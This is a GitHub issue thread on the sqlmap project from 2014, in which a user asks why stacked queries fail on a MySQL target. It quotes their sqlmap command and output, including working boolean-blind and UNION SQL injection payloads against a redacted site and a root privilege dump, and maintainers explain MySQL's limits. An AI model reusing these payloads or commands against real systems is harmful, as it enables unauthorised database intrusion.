Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

About stacked queries #619

Closed
ghost opened this issue Mar 2, 2014 · 3 comments
Closed

About stacked queries #619

ghost opened this issue Mar 2, 2014 · 3 comments

Comments

@ghost
Copy link

ghost commented Mar 2, 2014

Hello, long time no come over here! Greetings first of all.

My question is .. why can not use stacked queries if I have all the permissions of user and database is mysql.

sqlmap -u "http://www.xxxxx.com/xxxx.php" --data="nacionalidad=E&cedula=111111111&Consultar=Consultar" -p cedula -v 6 --dbms=Mysql --risk=5 --level=3 --sql-query="UPDATE TEST"

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: POST
Parameter: cedula
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: nacionalidad=E&cedula=111111111' RLIKE (SELECT (CASE WHEN (9194=9194) THEN 111111111 ELSE 0x28 END)) AND 'uaRV'='uaRV&Consultar=Consultar
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))

Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: nacionalidad=E&cedula=111111111' UNION ALL SELECT NULL,NULL,CONCAT(0x717a646e71,0x654a4a47796d704f5954,0x7172766771)#&Consultar=Consultar
Vector:  UNION ALL SELECT NULL,NULL,[QUERY]#

web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.0
[01:38:30] [INFO] fetching current user
[01:38:30] [DEBUG] performed 0 queries in 0.00 seconds
current user: 'root@%'

[01:40:05] [INFO] fetching database users privileges
[01:40:05] [DEBUG] performed 0 queries in 0.01 seconds
database management system users privileges:
[*] 'root'@'%' (administrator) [27]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
@SQLmapTester
Copy link

I think that it is not a stacked queries, try run sqlmap again with switch --technique=sq

Also note what
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (0-3, default 1) you have entered 5

Regards to Venesuela )))

@stamparm
Copy link
Member

stamparm commented Mar 2, 2014

You rarely see stacked queries if DBMS is not PostgreSQL or MsSQL. In your
case you can forget about it.
On Mar 2, 2014 12:43 PM, "Jesús Machado" notifications@github.com wrote:

Hello, long time no come over here! Greetings first of all.

My question is .. why can not use stacked queries if I have all the
permissions of user and database is mysql.

sqlmap -u "http://www.xxxxx.com/xxxx.php"
--data="nacionalidad=E&cedula=111111111&Consultar=Consultar" -p cedula -v 6
--dbms=Mysql --risk=5 --level=3 --sql-query="UPDATE TEST"
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:

Place: POST
Parameter: cedula
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
clause (RLIKE)
Payload: nacionalidad=E&cedula=111111111' RLIKE (SELECT (CASE WHEN
(9194=9194) THEN 111111111 ELSE 0x28 END)) AND
'uaRV'='uaRV&Consultar=Consultar
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28
END))

Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: nacionalidad=E&cedula=111111111' UNION ALL SELECT NULL,NULL,CONCAT(0x717a646e71,0x654a4a47796d704f5954,0x7172766771)#&Consultar=Consultar
Vector: UNION ALL SELECT NULL,NULL,[QUERY]#

web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.0
[01:38:30] [INFO] fetching current user
[01:38:30] [DEBUG] performed 0 queries in 0.00 seconds
current user: 'root@%'

[01:40:05] [INFO] fetching database users privileges
[01:40:05] [DEBUG] performed 0 queries in 0.01 seconds
database management system users privileges:
[*] 'root'@'%' (administrator) [27]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE

Reply to this email directly or view it on GitHubhttps://github.com//issues/619
.

@ghost
Copy link
Author

ghost commented Mar 3, 2014

Ohhh I understand, the problem is that I am root but can not do much, just to see the looks and it does not help me at all when it comes to safety testing, nor can I read files having the full patch disclousure.

And greetings and thanks for remembering my country :)

@stamparm stamparm closed this as completed Mar 3, 2014
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@stamparm @SQLmapTester